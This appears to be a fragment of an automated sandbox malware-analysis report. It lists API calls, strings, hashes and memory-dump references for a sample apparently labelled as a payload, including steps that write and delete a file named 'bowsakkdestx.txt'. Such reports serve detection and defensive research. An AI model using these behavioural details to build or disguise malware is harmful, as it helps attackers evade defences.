                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 5d1345cc7cc2b76b6e3cb215d16c45519ccc9bca275b968dcd16dc40d70f19cf
                                                                                                                                                                        • Instruction ID: 552f3a967652e95a4dea4ce6151d1b65661da2669c1b2b6f72c720c8febe1faf
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d1345cc7cc2b76b6e3cb215d16c45519ccc9bca275b968dcd16dc40d70f19cf
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C018631B9030DBBEF215B55DD4AFA67B6CEB45B40F144061FB00AE1D2D7F5A81586A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: 6a7035dcc42a4492a7112bef65573891c97872f64d853ab110bc6ed87b73ab5b
                                                                                                                                                                        • Instruction ID: 2b50d11d58a9f27670d215bf3c36aff5c54b27ceec6053aec8427ff37b41a270
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a7035dcc42a4492a7112bef65573891c97872f64d853ab110bc6ed87b73ab5b
                                                                                                                                                                        • Instruction Fuzzy Hash: 6451B53172410D9BDB24CE5CD880A7AF7AAEF85790B24893EFA55CB381C771DC618B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write
                                                                                                                                                                        • String ID: /
                                                                                                                                                                        • API String ID: 3115901604-3521864042
                                                                                                                                                                        • Opcode ID: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                                                                                                                                                                        • Instruction ID: 613a97f810becdf0b622582aac2217bc56b6e1bf7bbec4d13a0963499bf9f7d1
                                                                                                                                                                        • Opcode Fuzzy Hash: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                                                                                                                                                                        • Instruction Fuzzy Hash: 0141C631B027069FDF2A8FA9C8A856F77A9BF84360B25812DE805C76C5DF70DD518B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: c3bad34f8dd0a88900a847d69e4d44c6fd47b8ad2528ee15b6a2cae469207bb2
                                                                                                                                                                        • Instruction ID: a6c6e22f885346edf6309b29e7ff3b7f7b532cb5afa25a896d0346a1c0e12c33
                                                                                                                                                                        • Opcode Fuzzy Hash: c3bad34f8dd0a88900a847d69e4d44c6fd47b8ad2528ee15b6a2cae469207bb2
                                                                                                                                                                        • Instruction Fuzzy Hash: F731BB3132010C9BDB24EE5CD885977F76AEB417907504638FE658B2C5D7B1ED518B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: .\crypto\buffer\buffer.c$C74
                                                                                                                                                                        • API String ID: 2102423945-3322797900
                                                                                                                                                                        • Opcode ID: bdb2e58c417e23789cbf07004e834be24d0978c3d06cd625a665f47c03c0ea57
                                                                                                                                                                        • Instruction ID: 5fadb2f87c26155e80e7fceb08854aebf4343c04b2df224b6dd05789399b4c43
                                                                                                                                                                        • Opcode Fuzzy Hash: bdb2e58c417e23789cbf07004e834be24d0978c3d06cd625a665f47c03c0ea57
                                                                                                                                                                        • Instruction Fuzzy Hash: 422101B6B447217BE209666CFCD2F56B389EB94B14F00402AF658DB6C1E2A0BC1087D1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 002EC5DA
                                                                                                                                                                        • UuidToStringA.RPCRT4(?,00000000), ref: 002EC5F6
                                                                                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 002EC640
                                                                                                                                                                        Strings
                                                                                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 002EC687
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                                                                                        • Opcode ID: a693f2b5af27d002b43ee6d5ad2d6201c31171b8bca46d6e5299c3889957672c
                                                                                                                                                                        • Instruction ID: ef0a26ed43c7d934a2952bbd1e38b2386ed7e5414e76d36108eee3125fc17441
                                                                                                                                                                        • Opcode Fuzzy Hash: a693f2b5af27d002b43ee6d5ad2d6201c31171b8bca46d6e5299c3889957672c
                                                                                                                                                                        • Instruction Fuzzy Hash: 9F214C711143419BD714DF24D80476BBBECAFC1348F104A2EF4C583290D775D505CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002EC48B
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002EC4A9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                        • Opcode ID: f66b4cde565a39de27e82f410e213bcac3c84dc5ad9185182ffa19747f452a49
                                                                                                                                                                        • Instruction ID: 30b9795576b11dfdcb26e9d633b51497b651bcf535380e40cc739fa60dd47298
                                                                                                                                                                        • Opcode Fuzzy Hash: f66b4cde565a39de27e82f410e213bcac3c84dc5ad9185182ffa19747f452a49
                                                                                                                                                                        • Instruction Fuzzy Hash: B1014E7278032833DD326A946C87FFB775CCF52721F0000A6FE08D61C0D5A5455647D1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 002FBA4A
                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 002FBA73
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                                                                                        • String ID: 0$>>
                                                                                                                                                                        • API String ID: 1693014935-193288283
                                                                                                                                                                        • Opcode ID: db2d2e80d4545769dd3d16753b7542e6bebdb4bb3720e354a86b83784f077813
                                                                                                                                                                        • Instruction ID: 64f548c6c2f229536ac6ae12071f3c8e4a34f2b84fedfaa81d737de6cb3ecf9c
                                                                                                                                                                        • Opcode Fuzzy Hash: db2d2e80d4545769dd3d16753b7542e6bebdb4bb3720e354a86b83784f077813
                                                                                                                                                                        • Instruction Fuzzy Hash: 76F0AFB4C1531CABEB01DF91D9197AEBBB8BB09308F104259D5147A280D7BA1618CF95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002EC438
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002EC44E
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002EC45B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 610490371-2616962270
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove_strtok
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3446180046-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0031C6AD
                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 0031C6DB
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0031C0ED,?,00BFBBEF,00000003), ref: 0031C709
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0031C0ED,?,00BFBBEF,00000003), ref: 0031C73F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 002EF125
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 002EF198
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 002EF1A1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002EF1A8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1421093161-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 003A70AB
                                                                                                                                                                          • Part of subcall function 003A77A0: ___BuildCatchObjectHelper.LIBCMT ref: 003A77D2
                                                                                                                                                                          • Part of subcall function 003A77A0: ___AdjustPointer.LIBCMT ref: 003A77E9
                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 003A70C2
                                                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 003A70D4
                                                                                                                                                                        • CallCatchBlock.LIBCMT ref: 003A70F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00305007: __getptd_noexit.LIBCMT ref: 00305008
                                                                                                                                                                          • Part of subcall function 00305007: __amsg_exit.LIBCMT ref: 00305015
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00305A01
                                                                                                                                                                          • Part of subcall function 00308C96: __calloc_impl.LIBCMT ref: 00308CA5
                                                                                                                                                                        • __lock.LIBCMT ref: 00305A37
                                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 00305A43
                                                                                                                                                                        • __lock.LIBCMT ref: 00305A57
                                                                                                                                                                          • Part of subcall function 00305208: __getptd_noexit.LIBCMT ref: 00305208
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2580527540-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 002F27B9
                                                                                                                                                                        • _malloc.LIBCMT ref: 002F27C3
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        • _memset.LIBCMT ref: 002F27CE
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 002F27E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 002F2806
                                                                                                                                                                        • _malloc.LIBCMT ref: 002F2814
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        • _memset.LIBCMT ref: 002F281F
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 002F2832
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2824100046-0
